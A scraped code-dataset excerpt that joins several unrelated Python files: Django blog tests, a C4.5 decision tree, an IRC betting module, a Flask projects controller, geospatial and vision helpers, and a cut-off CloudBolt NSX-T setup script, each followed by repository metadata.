Post.objects.all().delete()
self.assertEqual(Post.objects.count(), 0)
# 1.1. 포스트 목록 페이지를 가져온다.
response = self.client.get('/blog/') # 목록페이지에 대해 요청된 결과가 들어있음. 정상 작동이면 200 반환
# 1.2. 정상적으로 페이지가 로드된다.
self.assertEqual(response.status_code, 200) # http에서 응답받는 값과 코드.
# 1.3. 페이지 타이틀이 'Blog'이다.
soup = BeautifulSoup(response.content, 'html.parser')
# 2.2. main area에 "아직 게시물이 없습니다."라는 문구가 나타난다.
main_area = soup.find('div', id="main-area") # find는 태그를 찾는 함수
self.assertIn('아직 게시물이 없습니다.', main_area.text)
# 포스트 목록 페이지 테스트 코드
def test_post_detail(self):
# 1.1. Post가 하나 있다.
post_000 = Post.objects.create(
title='첫 번째 포스트 입니다.',
content='Hello world. We are the world',
author=self.user_james,
category=self.category_culture,
)
# 1.2. 그 포스트의 url은 '/blog/1'dlek.
self.assertEqual(self.post_001.get_absolute_url(), '/blog/1/')
# 2 첫 번째 포스트의 상세 페이지 테스트
# 2.1. 첫 번째 post url로 접근하면 정상적으로 작동한다. (status_code = 200)
response = self.client.get(self.post_001.get_absolute_url())
self.assertEqual(response.status_code, 200)
soup = BeautifulSoup(response.content, 'html.parser')
self.navbar_test(soup)
self.category_test(soup)
# 2.3. 첫 번째 포스트의 제목(title)이 웹브라우저 탭 title에 들어있다.
self.assertIn(self.post_001.title, soup.title.text)
# 2.4. 첫 번째 포스트의 제목(title)이 포스트 영역(post_area)에 있다.
main_area = soup.find('div', id="main-area")
post_area = main_area.find('div', id="post-area")
self.assertIn(self.post_001.title, post_area.text)
self.assertIn(self.category_programming.name, post_area.text)
self.assertIn(self.tag_hello.name, post_area.text)
self.assertNotIn(self.tag_python.name, post_area.text)
self.assertNotIn(self.tag_python_kor.name, post_area.text)
# 2.5. 첫 번째 포스트의 작성자(author)가 포스트 영역에 있다.
# 아직 작성 불가
self.assertIn(self.user_james.username.upper(), post_area.text)
# 2.6. 첫 번째 포스트의 내용(content)이 포스트 영역에 있다.
self.assertIn(self.post_001.content, post_area.text)
| devMooon/internet-programming | 과제/10주차/컴퓨터공학전공20200675문서연_tests.py | 컴퓨터공학전공20200675문서연_tests.py | py | 11,826 | python | ko | code | 0 | github-code | 1 | [
{
"api_name": "django.test.TestCase",
"line_number": 15,
"usage_type": "name"
},
{
"api_name": "django.test.Client",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "django.contrib.auth.models.User.objects.create_user",
"line_number": 19,
"usage_type": "call"
}... |
10604830299 | from datetime import datetime
def compare_dateprices(dp_a, dp_b, initial=True):
date_a, date_b = dp_a[0], dp_b[0]
if initial:
best_dp = dp_a if date_a <= date_b else dp_b
else:
best_dp = dp_a if date_a > date_b else dp_b
return best_dp
if __name__ == "__main__":
date1 = datetime.strptime("2000-01-01", "%Y-%m-%d").date()
date2 = datetime.strptime("2000-01-01", "%Y-%m-%d").date()
dp1 = (date1, 100)
dp2 = (date2, 200)
best_dp = compare_dateprices(dp1, dp2, initial=False)
print(best_dp)
| sullyD64/bigdata-2019 | project1/src/spark/misc/tests.py | tests.py | py | 552 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "datetime.datetime.strptime",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 16,
"usage_type": "name"
},
{
"api_name": "datetime.datetime.strptime",
"line_number": 17,
"usage_type": "call"
},
{
"api_name"... |
26398264145 | from copy import deepcopy
from utils import *
from test import test_all
from c45 import max_gain
import numpy as np
import matplotlib.pyplot as plt
from sklearn.metrics import roc_curve, precision_recall_curve
def build_tree(T):
"""
An entry point in C45 algorithm.
_T_ - a two-dimensional array representing data table in the following format:
[
['<class value>', '<param1>', '<param2>', ...],
['<class value>', '<param1>', '<param2>', ...],
['<class value>', '<param1>', '<param2>', ...],
...
]
Returns the tree in array format.
"""
col = max_gain(T)
if col == None:
return {'value': get_major_class(T), 'key': 'leaf'}
tree = []
subtables = table_partition(T, col)
for subtable in subtables:
v = subtable[0][col]
if is_one_classed(subtable):
tree.append({'attr': col, 'value': v, 'class': subtable[0][0], 'chance': 1, 'count': len(subtable)})
else:
subtable = del_col(subtable, col)
subtree = build_tree(subtable)
if subtree['key'] == 'leaf':
tree.append({'attr': col, 'value': v, 'class': subtree['value'][0], 'chance': subtree['value'][1], 'count': subtree['value'][2]})
else:
tree.append({'attr': col, 'value': v, 'class': False, 'childs': subtree['value']})
return {'value': tree, 'key': 'tree'}
names = read_attributes()
def plot_roc_curve(true_y, y_prob):
"""
plots the roc curve based of the probabilities
"""
fpr, tpr, thresholds = roc_curve(true_y, y_prob)
plt.plot(fpr, tpr)
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.show()
def plot_pr_curve(true_y, y_prob):
precision, recall, thresholds = precision_recall_curve(true_y, y_prob)
plt.plot(recall, precision)
plt.xlabel("Recall")
plt.ylabel("Percision")
plt.show()
if __name__ == '__main__':
# Получаем данные из файла и атрибуты
table, rand_list = read_file()
test_table = deepcopy(table)
# Создаем дерево решений
tree = build_tree(table)['value']
# Получаем таблицу с классом, и количеством объектов в данном классе на каждом шаге
roc_table = collect_chances(tree)
y = np.array([])
y_prob = np.array([])
for row in roc_table:
y = np.append(y, [row['class']] * row['count'])
y_prob = np.append(y_prob, [row['chance']] * row['count'])
plot_pr_curve(y, y_prob)
plt.close()
plot_roc_curve(y, y_prob)
test_all(tree, test_table) | buffer404/university | year3/Artificial intelligence systems/lab3/main.py | main.py | py | 2,684 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "c45.max_gain",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "sklearn.metrics.roc_curve",
"line_number": 53,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.plot",
"line_number": 54,
"usage_type": "call"
},
{
"api_name": "matplot... |
17599914288 | import json
useDebugPrint = False
class Bets():
def __init__(self, bot, chatpointsObj, chateventsObj, jsonpath):
self.bot = bot
self.chatpointsObj = chatpointsObj
self.chateventsObj = chateventsObj
self.jsonpath = jsonpath
self.bets = {}
try:
with open(self.jsonpath, 'r+') as file:
storedBets = json.load(file).get('bets', {})
for key in storedBets.keys():
self.bets[key] = Bet(key, '', '')
self.bets[key].recoverFromDict(storedBets[key])
except Exception:
pass
def count(self):
return len(self.bets.keys())
def asStrings(self):
return [self.bets[key].asString() for key in self.bets.keys()]
def createBet(self, name, description, channel='#shadows'):
if self.betExists(name):
return False
self.bets[name] = Bet(name, description, channel)
def betExists(self, name):
return not (self.bets.get(name, False) == False)
def closeBet(self, name):
if self.betExists(name):
return self.bets.get(name).closeBet(self)
return False
def addOptions(self, name, TEXT):
if self.betExists(name):
return self.bets.get(name).addOptions(self, TEXT)
return False
def addBet(self, name, channel, optionname, id, points, allpoints=False, printInChat=True):
if self.betExists(name):
return self.bets.get(name).addBet(self, channel, optionname, id, points, allpoints, printInChat)
return False
def reset(self):
self.bets = {}
def endBet(self, name, winningoption):
reply = False
if self.betExists(name):
reply = self.bets.get(name).endBet(self, winningoption)
self.bets[name] = False
del self.bets[name]
return reply
def save(self, path=False):
if not path:
path = self.jsonpath
with open(path, 'w+') as file:
bets = {key: self.bets[key].__dict__ for key in self.bets.keys()}
json.dump({'bets': bets}, file, indent=2)
file.close()
def getFilePath(self):
return self.jsonpath
class Bet():
def __init__(self, name, description, channel):
self.name = name
self.chatpointsDefaultKey = 'p'
self.chatpointsReservedKey = 'chatbet-reserved'
self.chatpointsStatisticsKey = 'chatbets'
self.channel = channel
self.gamecostreceiver = 'MAI'
self.description = description
self.options = {}
self.openForBets = True
def recoverFromDict(self, dct):
self.name = dct.get('name')
self.chatpointsDefaultKey = dct.get('chatpointsDefaultKey')
self.chatpointsReservedKey = dct.get('chatpointsReservedKey')
self.chatpointsStatisticsKey = dct.get('chatpointsStatisticsKey')
self.channel = dct.get('channel')
self.gamecostreceiver = dct.get('gamecostreceiver')
self.description = dct.get('description')
self.options = dct.get('options')
self.openForBets = dct.get('openForBets')
def __debugPrint(self, text):
if useDebugPrint:
print(text.encode('ascii', errors='backslashreplace'))
def __outputToChat(self, main, channel, msg, ignore=False):
if ignore:
return
self.__debugPrint(channel + ': ' + msg)
main.bot.privmsg(channel, msg)
def __addOptionIfNecessary(self, optionname):
if not self.options.get(optionname, False):
self.__debugPrint('adding option: ' + optionname)
self.options[optionname] = {}
def __addPlayerToOption(self, optionname, id, points):
if points <= 0:
return
self.__addOptionIfNecessary(optionname)
self.options[optionname][id] = self.options[optionname].get(id, 0) + points
def __reservePlayerPoints(self, main, name, points, partial):
return main.chatpointsObj.transferBetweenKeysById(name, self.chatpointsDefaultKey, self.chatpointsReservedKey, points, partial=partial)
def closeBet(self, main):
self.openForBets = False
def addOptions(self, main, TEXT):
for option in TEXT.lower().replace(",", " ").split():
if len(option) >= 1:
self.__addOptionIfNecessary(option)
def asString(self):
optionStrings = [key + " (" + format(sum(self.options[key].values()), '.1f') + ")" for key in self.options.keys()]
return self.name + ": " + self.description + " [" + ", ".join(optionStrings) + "]"
def addBet(self, main, channel, optionname, id, points, allpoints, printInChat):
self.__debugPrint('adding bet: ' + optionname + ', id=' + id + ', points=' + str(points) + ', allpoints=' + str(allpoints))
if not self.openForBets:
self.__outputToChat(main, channel, 'Betting is closed!')
return False
if optionname not in self.options.keys():
self.__outputToChat(main, channel, 'The selection option does not exist!')
return False
worked, amount = self.__reservePlayerPoints(main, id, points, partial=allpoints)
if worked:
self.__addPlayerToOption(optionname, id, amount)
if allpoints:
self.__outputToChat(main, channel, 'Noted! (' + format(amount, '.1f') + ' points)', ignore=(not printInChat))
else:
self.__outputToChat(main, channel, 'Noted!', ignore=(not printInChat))
return True
return False
def endBet(self, main, winningoption):
if (winningoption not in self.options.keys()):
return False
winning = {}
all = {}
for key in self.options.keys():
option = self.options[key]
if key == winningoption:
for name in option.keys():
winning[name] = winning.get(name, 0) + option[name]
all[name] = all.get(name, 0) + option[name]
else:
for name in option.keys():
all[name] = all.get(name, 0) + option[name]
winningpoints = sum(winning.values())
losingpoints = sum(all.values())
# first, all players send their lost points
for name in all.keys():
pointsLost = all[name]
dct = {name: pointsLost}
self.__debugPrint("Handling player " + name + ", sending " + str(pointsLost) + " points to gamecostreceiver")
main.chatpointsObj.transferByIds(self.gamecostreceiver, dct, receiverKey=self.chatpointsDefaultKey, giverKey=self.chatpointsReservedKey, allowNegative=False, partial=False)
main.chatpointsObj.transferByIds(self.gamecostreceiver, dct, receiverKey=self.chatpointsStatisticsKey, giverKey=self.chatpointsStatisticsKey, allowNegative=True, partial=False)
# then winners get their proportional parts back
for name in winning.keys():
pointsWon = (winning[name] / winningpoints) * losingpoints
pointsWon = int(pointsWon)
dct = {self.gamecostreceiver: pointsWon}
winning[name] = pointsWon
self.__debugPrint("Handling winner " + name + ", sending " + str(pointsWon) + " points from gamecostreceiver")
main.chatpointsObj.transferByIds(name, dct, receiverKey=self.chatpointsDefaultKey, giverKey=self.chatpointsDefaultKey, allowNegative=False, partial=False)
main.chatpointsObj.transferByIds(name, dct, receiverKey=self.chatpointsStatisticsKey, giverKey=self.chatpointsStatisticsKey, allowNegative=True, partial=False)
# stats
main.chateventsObj.addEvent(self.chatpointsStatisticsKey, {
'name': self.name,
'description': self.description,
'winners': winning,
'bets': all,
})
# inform players
for name in all.keys():
self.__outputToChat(main, name, 'The bet "{name}" finished, winning option was "{winningoption}"! Your points changed by {diff}, you have a total of {total} points now.'.format(**{
'name': self.name,
'winningoption': winningoption,
'diff': format(winning.get(name, 0) - all.get(name, 0), '.1f'),
'total': format(main.chatpointsObj.getById(name).get(self.chatpointsDefaultKey, 0), '.1f'),
}))
# inform channel
dct = {
'name': self.name,
'winningoption': winningoption,
'points': format(losingpoints, '.1f'),
'winnercount': str(len(winning.keys())),
'count': str(len(all.keys())),
}
if len(winning.keys()) >= 1:
self.__outputToChat(main, self.channel, 'The bet "{name}" finished, winning option was "{winningoption}"! {points} points are distributed to {winnercount} winners, from {count} participants!'.format(**dct))
else:
self.__outputToChat(main, self.channel, 'The bet "{name}" finished, winning option was "{winningoption}"! Nobody won any of the {points} points!'.format(**dct))
return True
| Petricpwnz/NyAI | modules/bet.py | bet.py | py | 9,192 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "json.load",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "json.dump",
"line_number": 67,
"usage_type": "call"
}
] |
1374574117 | import torch
from tqdm import tqdm
from tabulate import tabulate
from collections import OrderedDict
from torch.nn import functional as F
from HDG.engine.trainer import GenericNet
from HDG.utils import count_num_parameters, evaluator, TripletLoss
from HDG.engine import TRAINER_REGISTRY, GenericTrainer
from HDG.optim import build_optimizer, build_lr_scheduler
@TRAINER_REGISTRY.register()
class CrossGrad(GenericTrainer):
"""Cross-gradient training.
https://arxiv.org/abs/1804.10745.
"""
def __init__(self, cfg):
super().__init__(cfg)
self.eps_l = cfg.TRAINER.CROSSGRAD.EPS_L
self.eps_d = cfg.TRAINER.CROSSGRAD.EPS_D
self.alpha_l = cfg.TRAINER.CROSSGRAD.ALPHA_L
self.alpha_d = cfg.TRAINER.CROSSGRAD.ALPHA_D
def build_model(self):
print("Building Label Classifier")
self.label_classifier = GenericNet(self.cfg, self.num_classes)
self.label_classifier.to(self.device)
self.optimizer_label = build_optimizer(self.label_classifier, self.cfg.OPTIM)
self.scheduler_label = build_lr_scheduler(self.optimizer_label, self.cfg.OPTIM)
self.model_registration("label_classifier", self.label_classifier, self.optimizer_label, self.scheduler_label)
print("Building Domain Classifier")
self.domain_classifier = GenericNet(self.cfg, self.num_source_domains)
self.domain_classifier.to(self.device)
self.optimizer_domain = build_optimizer(self.domain_classifier, self.cfg.OPTIM)
self.scheduler_domain = build_lr_scheduler(self.optimizer_domain, self.cfg.OPTIM)
self.model_registration("domain_classifier", self.domain_classifier, self.optimizer_domain, self.scheduler_domain)
model_parameters_table = [
["Model", "# Parameters"],
["Label Classifier", f"{count_num_parameters(self.label_classifier):,}"],
["Domain Classifier", f"{count_num_parameters(self.domain_classifier):,}"]
]
print(tabulate(model_parameters_table))
def forward_backward(self, batch_data):
input_data, class_label, domain_label = self.parse_batch_train(batch_data)
input_data.requires_grad = True
# Compute Domain Perturbation
loss_domain = F.cross_entropy(self.domain_classifier(input_data), domain_label)
loss_domain.backward()
grad_domain = torch.clamp(input_data.grad.data, min=-0.1, max=0.1)
input_data_domain_perturb = input_data.data + self.eps_l * grad_domain
# Compute Label Perturbation
input_data.grad.data.zero_()
loss_label = F.cross_entropy(self.label_classifier(input_data), class_label)
loss_label.backward()
grad_label = torch.clamp(input_data.grad.data, min=-0.1, max=0.1)
input_data_label_perturb = input_data.data + self.eps_d * grad_label
input_data = input_data.detach()
# Update Label Classifier
triplet_loss = TripletLoss(margin=1.2)
output_original, representations_original = self.label_classifier(input_data, return_feature=True)
output_domain_perturb, representations_domain_perturb = self.label_classifier(input_data_domain_perturb, return_feature=True)
loss_c1 = F.cross_entropy(output_original, class_label)
loss_c2 = F.cross_entropy(output_domain_perturb, class_label)
loss_t1 = triplet_loss(representations_original, class_label)
loss_t2 = triplet_loss(representations_domain_perturb, class_label)
loss_l = (1 - self.alpha_l) * (loss_c1 + loss_t1) + self.alpha_l * (loss_c2 + loss_t2)
self.model_backward_and_update(loss_l, "label_classifier")
# Update Domain Classifier
loss_d1 = F.cross_entropy(self.domain_classifier(input_data), domain_label)
loss_d2 = F.cross_entropy(self.domain_classifier(input_data_label_perturb), domain_label)
loss_d = (1 - self.alpha_d) * loss_d1 + self.alpha_d * loss_d2
self.model_backward_and_update(loss_d, "domain_classifier")
loss_summary = {
"loss_l": loss_l.item(),
"loss_d": loss_d.item()
}
if self.batch_index + 1 == self.num_batches:
self.update_lr()
return loss_summary
def parse_batch_train(self, batch_data):
input_data = batch_data["img"].to(self.device)
class_label = batch_data["class_label"].to(self.device)
domain_label = batch_data["domain_label"].to(self.device)
return input_data, class_label, domain_label
def model_inference(self, input_data):
return self.label_classifier(input_data)
def test(self):
print("Extracting Feature Representation for Query Set and Gallery Set")
self.set_model_mode("eval")
representations = OrderedDict()
class_names_labels = OrderedDict()
with torch.no_grad():
self.label_classifier.semantic_projector = None
for batch_index, batch_data in enumerate(tqdm(self.test_data_loader)):
file_names, input_data, class_names = self.parse_batch_test(batch_data)
outputs = self.model_inference(input_data)
outputs = outputs.cpu()
for file_name, representation, class_name in zip(file_names, outputs, class_names):
representations[file_name] = representation
class_names_labels[file_name] = class_name
dist_mat = evaluator.compute_dist_mat(representations, self.data_manager.test_dataset)
evaluator.evaluate(dist_mat, self.data_manager.test_dataset)
| VirtueZhao/HDGC | HDG/engine/baseline/CrossGrad.py | CrossGrad.py | py | 5,587 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "HDG.engine.GenericTrainer",
"line_number": 12,
"usage_type": "name"
},
{
"api_name": "HDG.engine.trainer.GenericNet",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "HDG.optim.build_optimizer",
"line_number": 29,
"usage_type": "call"
},
{
... |
17977945273 | from models.Project import Project
from main import db
from flask import Blueprint, request, render_template, redirect, url_for, flash
from flask_login import login_required, current_user
projects = Blueprint('projects', __name__, url_prefix='/projects')
@projects.route('/', methods=['GET'])
def project_index():
projects = Project.query.all()
# return jsonify(projects_schema.dump(projects))
return render_template("projects_index.html", projects=projects)
@projects.route('/', methods=['POST'])
@login_required
def project_create():
name = request.form.get('name')
link = request.form.get('link')
description = request.form.get('description')
new_project = Project()
new_project.name = name
new_project.link = link
new_project.description = description
new_project.user_id = current_user.id
db.session.add(new_project)
db.session.commit()
flash('Project Created!')
# return jsonify(project_schema.dump(new_project))
return redirect(url_for('projects.project_show', id=new_project.id))
@projects.route('/<int:id>', methods=['GET'])
def project_show(id):
project = Project.query.get(id)
# return jsonify(project_schema.dump(project))
return render_template("project.html", project=project)
@projects.route('/my_projects', methods=['GET'])
@login_required
def project_show_user():
projects = Project.query.filter_by(user_id=current_user.id)
# return jsonify(projects_schema.dump(projects))
return render_template("projects_user.html", projects=projects)
# @projects.route('/<int:id>', methods=['DELETE'])
@projects.route("/delete/<int:id>", methods=['GET'])
@login_required
def project_delete(id):
project = Project.query.filter_by(id=id, user_id=current_user.id).first()
if not project:
flash('Unauthorised to delete this project')
return redirect(url_for('projects.project_show', id=id))
db.session.delete(project)
db.session.commit()
flash('Project Deleted')
return redirect(url_for('projects.project_show_user'))
# @projects.route('/<int:id>', methods=['PUT', 'PATCH'])
@projects.route("/update/<int:id>", methods=['POST'])
@login_required
def project_update(id):
project = Project.query.filter_by(id=id, user_id=current_user.id).first()
if not project:
flash('Unauthorised to update this project')
return redirect(url_for('projects.project_show', id=id))
project.name = request.form.get('name')
project.link = request.form.get('link')
project.description = request.form.get('description')
db.session.commit()
flash('Project Updated')
# return jsonify(project_schema.dump(project))
return redirect(url_for('projects.project_show', id=id))
@projects.route("/new", methods=["GET"])
def new_project():
return render_template("new_project.html")
@projects.route("/revise/<int:id>", methods=["GET"])
def revise_project(id):
project = Project.query.get(id)
return render_template("revise_project.html", project=project)
| eric-chew/T4A2-B | src/controllers/projects_controller.py | projects_controller.py | py | 3,040 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "flask.Blueprint",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "models.Project.Project.query.all",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "models.Project.Project.query",
"line_number": 11,
"usage_type": "attribute"
},
{
... |
23164192729 | import geopandas as gp
import shapely
def intersection(left, right, grid_size=0):
"""Intersect the geometries from the left with the right.
New, intersected geometries are stored in "geometry_right".
Uses spatial index operations for faster operations. Wholly contained
geometries from right are copied intact, only those that intersect but are
not wholly contained are intersected.
Parameters
----------
left : GeoDataFrame
right : GeoDataFrame
grid_size : int, optional (default: None)
if present, geometries and results from intersection will be
snapped to this precision grid
Returns
-------
DataFrame or None
output geometries are in "geometry_right"
None if there are no intersections
"""
tree = shapely.STRtree(right.geometry.values)
ix = tree.query(left.geometry.values, predicate="intersects")
if len(ix[0]) == 0:
return None
# copy original geometries; they will be clipped below if needed
intersects = gp.GeoDataFrame(
{
"geometry": left.geometry.values.take(ix[0]),
"index_right": right.index.values.take(ix[1]),
"geometry_right": right.geometry.values.take(ix[1]),
},
index=left.index.take(ix[0]),
crs=left.crs,
)
shapely.prepare(intersects.geometry.values)
contains = shapely.contains_properly(
intersects.geometry.values, intersects.geometry_right.values
)
# clip any that are not fully contained
tmp = intersects[~contains]
intersects.loc[~contains, "geometry_right"] = shapely.intersection(
tmp.geometry.values, tmp.geometry_right.values, grid_size=grid_size
)
return left.join(intersects.drop(columns=["geometry"]), how="inner").join(
right.drop(columns=["geometry"]), on="index_right"
)
| astutespruce/secas-blueprint | analysis/lib/geometry/intersection.py | intersection.py | py | 1,867 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "shapely.STRtree",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "geopandas.GeoDataFrame",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "shapely.prepare",
"line_number": 46,
"usage_type": "call"
},
{
"api_name": "shapely.contai... |
32308460282 | import os
from flask import jsonify, request
import requests
def getWeather():
try:
API_KEY = os.getenv("API_KEY")
args = request.args
lon = str(args.get('lon'))
lat = str(args.get('lat'))
url = f'https://api.openweathermap.org/data/2.5/weather?lat={lat}&lon={lon}&appid={API_KEY}'
response = requests.get(url).json()
return jsonify(response),200
except Exception as e:
raise Exception("Something bad happened") | HarshxiT/Krishi-Network | apps/weather/controller.py | controller.py | py | 492 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "os.getenv",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "flask.request.args",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "flask.request",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "requests.get",
"line... |
4836908083 | ##########################################
# @subject : Person segmentation #
# @author : perryxin #
# @date : 2018.12.27 #
##########################################
import torch.utils.data as Data
from read_data import *
from config import *
from models.unet_plusplus import *
from models.linknet import *
model_name = 'linknet' # 'unet++'
if model_name == 'unet++':
net = Unet_2D(3, 1, 'test')
checkpoint = torch.load("../models/weights/unet++_11.pth", map_location='cpu')
dataset_test = MyData(istrain="test", size=256)
else: # 'linknet'
net = LinkNet()
checkpoint = torch.load("../models/weights/link_640_57.pth", map_location='cpu')
dataset_test = MyData(istrain="test", size=640)
net.load_state_dict(checkpoint['net'])
loader_test = Data.DataLoader(dataset_test, batch_size=conf.BATCH_SIZE_TEST, shuffle=False)
net.cuda()
print("test_images", len(dataset_test))
print("start testing...")
# val###################
net.eval()
test_iou = 0
t1 = time.time()
for i, (img, label) in enumerate(loader_test):
output = net(img.float()).cuda()
output[output >= 0.5] = 1.
output[output != 1] = 0.
iou_ = iou(output.cpu(), label)
test_iou += iou_
print("img_%d: iou=%.4f" % (i, iou_))
#############show
isShow = True
if isShow:
import matplotlib.pyplot as plt
plt.subplot(221)
output = output[0, 0].detach().numpy() # .detach().cpu()
label = label[0, 0].numpy()
img = (img[0].permute(1, 2, 0).detach().numpy() * conf.std + conf.mean) # .detach().cpu()
img = img * 255
plt.imshow(np.uint8(img))
plt.title("origin")
plt.axis('off')
plt.xticks([])
plt.yticks([])
plt.subplot(222)
plt.imshow(label)
plt.title("label")
plt.axis('off')
plt.xticks([])
plt.yticks([])
plt.subplot(223)
mm = apply_mask(img, output, color=random_colors(1)[0])
# mm=cv2.addWeighted(np.uint8(img),0.8,np.uint8(output*255),0.2,0)
plt.imshow(np.uint8(mm))
plt.title("origin+seg")
plt.axis('off')
plt.xticks([])
plt.yticks([])
plt.subplot(224)
plt.imshow(output)
plt.title("seg")
plt.axis('off')
plt.xticks([])
plt.yticks([])
# plt.savefig("./results/imgs/img_%d.png"%i)
plt.show()
del img, label
test_iou /= len(loader_test)
t2 = time.time()
print("speed: %.4f fps, test_iou : %.4f" % (len(dataset_test) / (t2 - t1), test_iou))
| hellopipu/person_seg | test.py | test.py | py | 2,579 | python | en | code | 15 | github-code | 1 | [
{
"api_name": "torch.utils.data.load",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "torch.utils.data",
"line_number": 15,
"usage_type": "name"
},
{
"api_name": "torch.utils.data.load",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "torch.ut... |
39424860660 | import cv2
import io
import os
from google.cloud import vision
os.environ["GOOGLE_APPLICATION_CREDENTIALS"] = ".." #put your google API credintials here
# Instantiates a client
client = vision.ImageAnnotatorClient()
#folder = "/uploads/"
class Image():
def __init__(self):
self.labels = []
self.image = None
def capture(self):
# chi 7aja
cam = cv2.VideoCapture(0)
cv2.namedWindow("Camera")
img_counter = 0
while True:
ret, frame = cam.read()
if not ret:
print("failed to grab frame")
break
cv2.imshow("test", frame)
k = cv2.waitKey(1)
if k % 256 == 27:
# ESC pressed
print("Escape hit, closing...")
break
elif k % 256 == 32:
# SPACE pressed
img_name = "opencv_frame_{}.png".format(img_counter)
cv2.imwrite(img_name, frame)
print("{} written!".format(img_name))
img_counter += 1
cam.release()
cv2.destroyAllWindows()
self.image = img_name
def capture_bis(self):
# chi 7aja
# initialize the camera
cam = cv2.VideoCapture(0) # 0 -> index of camera
s, img = cam.read()
img_counter = 0
if s: # frame captured without any errors
#namedWindow("cam-test", CV_WINDOW_AUTOSIZE)
#imshow("cam-test", img)
cv2.waitKey(0)
#destroyWindow("cam-test")
img_name = "opencv_frame_{}.png".format(img_counter)
cv2.imwrite(img_name, img) # save image
self.image = img_name
def findLabels(self):
# The name of the image file to annotate
file_name = self.image
# Loads the image into memory
with io.open(file_name, 'rb') as image_file:
content = image_file.read()
image = vision.Image(content=content)
# Performs label detection on the image file
response = client.label_detection(image=image)
labels = response.label_annotations
#self.labels = labels
print('Labels:')
for label in labels:
print(label.description+', score: '+str(label.score))
self.labels.append(label)
| yahyaakli/spring2021hackathon | src/Image.py | Image.py | py | 2,347 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "os.environ",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "google.cloud.vision.ImageAnnotatorClient",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "google.cloud.vision",
"line_number": 11,
"usage_type": "name"
},
{
"api_n... |
71291623714 | import gensim
from sklearn import svm
from sklearn import datasets
from sklearn.feature_extraction.text import TfidfVectorizer
from joblib import dump, load
import flask
from flask_restful import Resource, Api, reqparse
from flask import request
from functools import partial
from flask import request, jsonify
app = flask.Flask(__name__)
app.config["DEBUG"] = True
def k_means_sort(e, product_terms, query):
#global product_terms, query
occurences = 0
for word in [x.lower() for x in e.split(',')[1].split('-')]:
if word in product_terms or word in query.split(' '):
occurences += 1
occurences /= len(e.split(',')[1].split('-'))
average_similarity = 0
counter = 0
for word in [x.lower() for x in e.split(',')[1].split('-')]:
for query_word in query.split(' '):
if query_word in word2vec_model.wv.vocab and word in word2vec_model.wv.vocab:
average_similarity += word2vec_model.similarity(query_word, word)
counter += 1
average_similarity /= (counter if counter != 0 else 1)
return occurences + average_similarity
word2vec_model = gensim.models.Word2Vec.load('../MachineLearningModels/Word2Vec/word2vec.model')
vectorizing_model = load('../MachineLearningModels/KMeansClustering/vectorizing_model.sav')
clustering_model = load('../MachineLearningModels/KMeansClustering/clustering_model.sav')
products = open('../formatted_data/all_products.txt').read().split('\n')[:-1]
@app.route('/', methods=['GET'])
def home():
parser = request.args
#parser.add_argument('query', type=str)
query = parser['query']
prediction = clustering_model.predict(vectorizing_model.transform([query]))[0]
product_terms = [vectorizing_model.get_feature_names()[product_term_index] for product_term_index in clustering_model.cluster_centers_.argsort()[:, ::-1][prediction, :30]]
relavant_products = products.copy()
relavant_products.sort(key=partial(k_means_sort, product_terms=product_terms, query=query), reverse=True)
return jsonify(relavant_products[:10])
#return "Distant Reading Archive: This site is a prototype API for distant reading of science fiction novels."
app.run() | themorlock/SearchMart | RestAPI/api.py | api.py | py | 2,142 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "flask.Flask",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "gensim.models.Word2Vec.load",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "gensim.models",
"line_number": 32,
"usage_type": "attribute"
},
{
"api_name": "joblib.loa... |
35990658808 | """
This module is used to store the methods for setting up the NSX-T XUI
"""
import json
import os
from os import path
from packaging import version
from cbhooks.models import CloudBoltHook
from servicecatalog.models import ServiceBlueprint
from resourcehandlers.models import ResourceHandler
from xui.nsxt.xui_utilities import check_for_nsxt, setup_nsx_tags
from django.utils.text import slugify
from utilities.logger import ThreadLogger
logger = ThreadLogger(__name__)
XUI_PATH = path.dirname(path.abspath(__file__))
XUI_NAME = XUI_PATH.split("/")[-1]
CONFIG_FILE = f'/var/opt/cloudbolt/proserv/xui/xui_versions.json'
def get_data_from_config_file(property_key):
with open(CONFIG_FILE, 'r') as f:
config = json.load(f)
data = config[XUI_NAME][property_key]
return data
# If we find a Blueprint with the same name, should it be overwritten?
try:
OVERWRITE_EXISTING_BLUEPRINTS = get_data_from_config_file(
'OVERWRITE_EXISTING_BLUEPRINTS')
except Exception:
OVERWRITE_EXISTING_BLUEPRINTS = True
# From what I can tell, when a Blueprint is using a remote source, the actions
# are only updated at initial creation. Setting this toggle to True would
# set each action to use the remote source - forcing update of the actions when
# the XUI gets updated
try:
SET_ACTIONS_TO_REMOTE_SOURCE = get_data_from_config_file(
'SET_ACTIONS_TO_REMOTE_SOURCE')
except Exception:
SET_ACTIONS_TO_REMOTE_SOURCE = True
def run_config(xui_version):
config_needed = False
try:
with open(CONFIG_FILE, 'r') as f:
config = json.load(f)
current_version = config[XUI_NAME]["current_version"]
if version.parse(current_version) < version.parse(xui_version):
logger.info(f"Current Version: {current_version} is less than"
